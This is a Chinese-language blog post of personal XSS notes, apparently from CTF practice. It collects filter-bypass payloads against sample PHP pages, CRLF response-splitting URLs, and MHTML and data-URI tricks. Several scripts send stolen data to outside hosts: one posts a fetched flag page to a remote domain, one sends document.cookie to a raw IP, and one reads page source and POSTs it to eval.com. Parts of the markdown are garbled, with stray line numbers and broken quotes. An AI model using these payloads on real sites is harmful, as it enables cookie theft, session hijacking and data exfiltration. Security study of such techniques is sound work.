Tianji's Blog.

xss

Word count: 1,699 / Reading time: 9 min
2018/03/27 Share

link 标签引入外部 js。

1
2
3
也可以用域名,将 . 用 。 代替。
<link rel=import href=\\八进制ip
<link/rel=import href=https:\\d7cb7b72.w1n.pw\background.html>
1
2
3
4
5
6
7
<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://router.vip/flag.php", false);
xhr.send();
a=xhr.responseText;
location.href='https://master.xbfzss.cn/?a='+escape(a);
</script>

xss:
jquery版本>=1.9
sourceMappingURL加载外部资源

1
2
3
<input name=keyword  value="<scrilpt>alert(1);</script>">
payload:" onmouseover=alert(1) "
<input name=keyword value="" onmouseover=alert(1) "">
1
2
3
<input name=keyword  value=''>
payload:' onmouseover=alert(1) '
<input name=keyword value=' onmouseover=alert(1) ''>
1
2
3
4
5
6
<input name=keyword  value="">
过滤了on
<input name=keyword value="" o_nclick=alert(1) "">

payload:"><a href="javascript:alert(1)" >as</a>
<input name=keyword value=""><a href="javascript:alert(1)" ></a>">
1
2
3
4
5
6
<input name=keyword  value="">
过滤了on
<input name=keyword value="" o_nclick=alert(1) "">

payload:"><a href="javascript:alert(1)" >as</a>
<input name=keyword value=""><a href="javascript:alert(1)" ></a>">

空格可以使用%0a,%0d绕过

= onmouseover=alert`1`
alert(1) 两边的括号可以使用替换

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<html>
<script type="text/javascript">
var call_window;
call_window = window.open("http://localhost/call.php");
setTimeout(function(){
call_window.postMessage({
type: "audio",
details: {
sender_username: "<img src=xx: onerror=window.open('http://123.207.90.143/index.php?a='+document.cookie)>",
sender_team_name: "zzzz",
receiver_username: "test",
receiver_team_name: "test"
}
}, "*");
}, 1000);
</script>
</html>

CRLF 注射攻击(HTTP ResponseSplitting)(HRS)

1
2
nameValueCollection request = Request.QueryString;
Response.Cookies["username"].Value = request["text"]

正常访问:

http://www.test.com/demo.aspx?text=test

正常情况下,会使用text=test来setcookie

payload:

http://www.test.com/demo.aspx?text=a%0D%0ASet-Cookie%03A020HackedCookie=Hacked

正常情况下:HTTP Response如下:

HTTP/1.1 200 OK

Set-Cookie: userName=test

Content-Type: text/html; charset-utf-8

使用payload的情况下:

HTTP/1.1 200 OK

Set-Cookie: username=a

Set-Cookie: HackedCookie=Hacked

Content-Type: text/html; charset-utf8

更严重的情况下:

payload:

http://www.test.com/page.php?page=%0d%0aContent-Type: text/html%0D%0AHTTP/1.1 200 OK %0D%0AContent-Type: text/html%0D%0A%0D%0A%3Chtml%3EHacker Content%3C/html%3E

该代码明显恶意,但是浏览器也会执行。

MHTML协议安全[IE浏览器]

MHTML协议格式:

mhtml: [Mhtml_File_Url]![Original_Resource_Url]

新建一个HTML文件,demo.html

1
2
3
4
5
6
7
8
Content-Type: multipart/related; boundary="_boundary_by_mere"

--_boundary_by_mere
Cotent-Location: demo
Content-Transfer-Encoding: base64

PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ=
--_boundary_by_mere--

当使用如下链接进行访问的时候,就会弹窗:

mhtml:http://127.0.0.1/demo.html!demo

注意:为了让IE调用MHTML Protocol Handler将该资源当做MHTML格式文件解析处理,需要把URL修改为MHTML协议,在”http”之前加上”mhtml:”,在url后边加上”!demo”字样。

此外,还可以结合CRLF漏洞实现XSS。

首先PHP脚本如下(test.php):

1
2
3
<?php
echo $_GET['k'];
?>

构造url:

mhtml:http://127.0.0.1/test.php?k=ax%250AContent-Type%3A%20multipart%2frelated%3B%20boundary%3D%22_boundary_by_mere%22%250D%250A--_boundary_by_mere%250D%250ACotent-Location%3A%20xss%250D%250AContent-Transfer-Encoding%3A%20base64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%3D%250D%250A--_boundary_by_mere--!xss

利用Data URIs进行XSS

该方案和MHTML有些类似。Data URI格式如下:

data:[][;charset=][;base64],

data指代URI协议

mime type 代表数据类型,如PNG图片则为image/png,若无说明,默认为text/plain

charset 如果不适用base64,则使用charset指定的字符类型

encoded data 对应的编码信息

例如:

1
2
3
4
5
6
<img src="
yH5BAAAAAAALAAAAAAzADEAAAK8jI+pBr0PowytzotTtbm/DTqQ6C3hGX
ElcraA9jIr66ozVpM3nseUvYP1UEHF0FUUHkNJxhLZfEJNvol06tzwrgd
LbXsFZYmSMPnHLB+zNJFbq15+SOf50+6rG7lKOjwV1ibGdhHYRVYVJ9Wn
k2HWtLdIWMSH9lfyODZoZTb4xdnpxQSEF9oyOWIqp6gaI9pI1Qo7BijbF
ZkoaAtEeiiLeKn72xM7vMZofJy8zJys2UxsCT3kO229LH1tXAAAOw==">

XSS隐患,执行XSS最常用的方法是引入修正为,由于该特性只是按照标签配对,没有考虑HTML注释或其他复杂情况,会导致xss.

img编码绕过

1
2
3
<img src="" onerror="j&#00097vascript:alert('xss');">
<img src="" onerror="j&#97vascript:alert('xss1');">
<img src="" onerror=" javascript:alert('xss3');">

a绕过,javascript伪协议

1
"><a href="javascript:alert(1)">click me</a><"

body和div

1
2
"><body onload=alert(1)><"
"><div onclick="alert('xss')">click me<"

过滤括号

1
2
3
4
5
6
7
<?php 
ini_set("display_errors", 0);
$str = strtolower(@$_POST["keyword"]);
while (strpos($str,'script')) {$str = str_replace('script', '', $str);}
$str = str_replace('(', '', $str);
$str = str_replace(')', '', $str);
echo ' <form class="main" action="index.php" method="POST"> <input name=keyword size=60 value="'.$str.'"> <input type=submit name=submit value="Search"/> </form>'; echo '<p class="main">No results for "<b>'.htmlspecialchars($str).'</b>"</p>'; ?>
1
2
"><body onload=alert`1`><"
" onfocus=alert`1` "

过滤',",' '

有时候用斜杠是可以代替空格的

1
2
3
4
5
6
7
8
<?php 
ini_set("display_errors", 0);
$str = strtolower(@$_POST["keyword"]);
while (strpos($str,'script')) {$str = str_replace('script', '', $str);}
$str = str_replace('(', '', $str);
$str = str_replace(')', '', $str);
$str = str_replace(' ', '', $str);
echo ' <form class="main" action="index.php" method="POST"> <input name=keyword size=60 value="'.$str.'"> <input type=submit name=submit value="Search"/> </form>'; echo '<p class="main">No results for "<b>'.htmlspecialchars($str).'</b>"</p>'; ?
1
2
3
"/onfocus=alert`1`/"
"><img/src='1'/onerror=alert`0`><"
"><<svg/onload=alert`1`><"

过滤尖括号里边的所有东西

1
2
3
4
5
<?php 
ini_set("display_errors", 0);
$str = strtolower(@$_POST["keyword"]);
$str = preg_replace("/<.*?>/", '', $str);
echo ' <form class="main" action="index.php" method="POST"> <input name=keyword size=60 value="'.$str.'"> <input type=submit name=submit value="Search"/> </form>'; echo '<p class="main">No results for "<b>'.htmlspecialchars($str).'</b>"</p>'; ?
1
2
3
4
5
" type=image src=x onerror=alert(1) "
=> <input type=image src=x onerror=alert(1)>
input会被当做img标签使用

"/onfocus=alert`1`/" => 不会自动触发

js中的连接符

1
2
3
4
<?php 
ini_set("display_errors", 0);
$name = $_GET["name"];
echo '<h3 class="main">No results for "<b>'; echo htmlspecialchars($name).'</b>"</h3>'; echo ' <script> var t="'.$name.'"; var s="xxxxxxxx"; var d="dddd"; </script>'; ?>
1
2
3
4
这里就是一个新的输出点了,你的值是输出在js代码中的 只要闭合双引号,然后就可以写你自己的js代码了 比如 "-alert(1)-" 赋值给url中的name即可 -是js中的连接符号


name=";alert(1);//

危险字符

< &lt
>
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| &    | ```&amp;```  |
| " | ```&quot;``` |
| ' | ```&#39``` |

## Dom-Based XSS

> document.URL
>
> document.URLUencoded
>
> document.location(.pathname|.href|.search|.hash)
>
> window.location(.pathname|.href|.search|.hash)
>
> document.referrer
>
> window.name
>
> document.cookie
>
> HTML5 postMessage
>
> localStorage/globalStorage
>
> XMLHTTPRequest response
>
> Input.value

## htmlspecialchars可绕过情况

echo “Please input the t1 as parameter”;

1
2


$str = ‘ onmouseover=alert(1) > //

1
2

因为htmlspecialchars默认只过滤`<`,`>`, `"`,`&`,默认为`ENT_COMPAT`

ENT_COMPAT - 默认。仅编码双引号。
ENT_QUOTES - 编码双引号和单引号。
ENT_NOQUOTES - 不编码任何引号。

1
2

## addslashes

echo “Please input the t1 as parameter”;

1
2

paylaod1:

$str = ‘ onmouseover=alert(1) //
=> 源码:

<input type=”text” value=’\’ onmouseover=alert(1) //‘>Please input the t2 as parameter
=> 浏览器处理结果:


1
2
3
4

在火狐里边也能触发,如果去掉 `//` 则无法触发,应该是`//` 注释掉了后边的单引号,浏览器处理出现问题

如果使用以上 payload,浏览器最终结果:


1
2

如果去掉`//`

$str = ‘ onmouseover=alert(1) //
=> 源码:

<input type=”text” value=’\’ onmouseover=alert(1)’>Please input the t2 as parameter
=> 浏览器处理结果:

<input type=”text” value=’\’ onmouseover=alert(1)’>Please input the t2 as parameter

1
2
3
4
5
6

这时候,就无法触发alert。

paylaod2:

这个payload只能在编码为gbk的情况下才能使用。


1
2


%df’> //

1
2

## strip_tags绕过

echo ‘Please input the t1 as parameter’;

1
2

payload:

“ onmouseover=alert(1) //

1
2
3
4
5
6
7
8
9
10
11
12

## xsspayload:

`<img src=//eval.com:2222>`

`<svg onload=prompt(/xss/)>`

`<embed/src=//goo.gl/nlX0P>`

`<marquee/onstart=confirm(2)>`

## xss 读源码

function send(e) {
var t = new XMLHttpRequest;
t.open(“POST”, “//eval.com:2017”, !0),
t.setRequestHeader(“Content-type”, “text/plain”),
t.onreadystatechange = function() {
4 == t.readyState && t.status
},
t.send(e);
}
function getsource(src){
var t = new XMLHttpRequest;
t.open(“GET”, src, !0),
t.setRequestHeader(“Content-type”, “text/plain”),
t.onreadystatechange = function() {
4 == t.readyState && t.status
},
t.onload=function(e){
send(e.target.responseText);
}
t.send();
}
getsource(“/home/publiclist”);
`

CATALOG
  1. 1. CRLF 注射攻击(HTTP ResponseSplitting)(HRS)
  2. 2. MHTML协议安全[IE浏览器]
  3. 3. 利用Data URIs进行XSS
  4. 4. img编码绕过
  5. 5. a绕过,javascript伪协议
  6. 6. body和div
  7. 7. 过滤括号
  8. 8. 过滤',",' '
  9. 9. 过滤尖括号里边的所有东西
  10. 10. js中的连接符
  11. 11. 危险字符